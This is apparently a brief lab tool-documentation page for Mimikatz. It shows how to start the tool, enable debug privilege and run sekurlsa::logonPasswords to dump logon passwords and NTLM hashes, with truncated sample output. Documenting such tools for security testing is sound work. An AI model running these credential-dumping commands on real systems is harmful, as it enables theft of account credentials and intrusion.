Mimikatz

Description

Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets.

Purpose

Configuration Details

Sample Usage

Start command prompt, navigate to Mimikatz directory and start Mimikatz console:

cd c:\tools\mimikatz\x64\ && mimikatz.exe

Debugger mode

mimikatz # privilege::debug
Privilege "20" OK

Module sekurlsa - Dumping logon passwords / NTLM hash

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 231234 (00000000:0003a1a7)
Session : Interactive from 1
UserName : Vagrant
....

Data Location

This tool is located in C:\Tools\mimikatz\x64\.

Mimikatz on Github